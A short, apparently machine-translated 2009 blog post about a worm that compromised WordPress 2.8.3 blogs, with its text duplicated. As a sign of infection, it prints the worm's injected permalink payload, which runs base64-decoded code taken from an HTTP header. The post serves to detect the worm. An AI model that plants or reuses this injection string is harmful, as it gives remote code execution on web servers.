September 7, 2009 at 11:06WordPress Worm Epidemic
A month ago, it became known about a new critical vulnerability in WordPress 2.8.3, which makes it easy to change the administrator password remotely. WordPress 2.8.4 was released immediately to fix this vulnerability. As it turned out, not all bloggers follow updates.
This weekend, a real epidemic of a new virus broke out , hitting blogs on the engine WordPress 2.8.3 and earlier versions in branch 2.8. The worm logs on a blog, launches malicious code through the permalink structure and makes itself a second admin, then runs a script to erase itself from the users page and begins to quietly add spam and links to malicious content in archive topics.
The presence of the pest is quite difficult to detect immediately, especially if it has not yet published anything. To do this, check the permalinks / rss feed for the presence of the following code.
or
or errors
If there is such a code or the feed is broken, then the blog is infected.
The worm removal procedure is a non-trivial task .
By the way, Matt Mullenweg was born a great article on security, in which he urges users to constantly monitor and install fresh updates, here is an instruction for upgrading WordPress . This is the only way to protect yourself from this and future epidemics.
This weekend, a real epidemic of a new virus broke out , hitting blogs on the engine WordPress 2.8.3 and earlier versions in branch 2.8. The worm logs on a blog, launches malicious code through the permalink structure and makes itself a second admin, then runs a script to erase itself from the users page and begins to quietly add spam and links to malicious content in archive topics.
The presence of the pest is quite difficult to detect immediately, especially if it has not yet published anything. To do this, check the permalinks / rss feed for the presence of the following code.
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/or
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%or errors
‘error on line 22 at column 71: xmlParseEntityRef: no name wordpress’If there is such a code or the feed is broken, then the blog is infected.
The worm removal procedure is a non-trivial task .
By the way, Matt Mullenweg was born a great article on security, in which he urges users to constantly monitor and install fresh updates, here is an instruction for upgrading WordPress . This is the only way to protect yourself from this and future epidemics.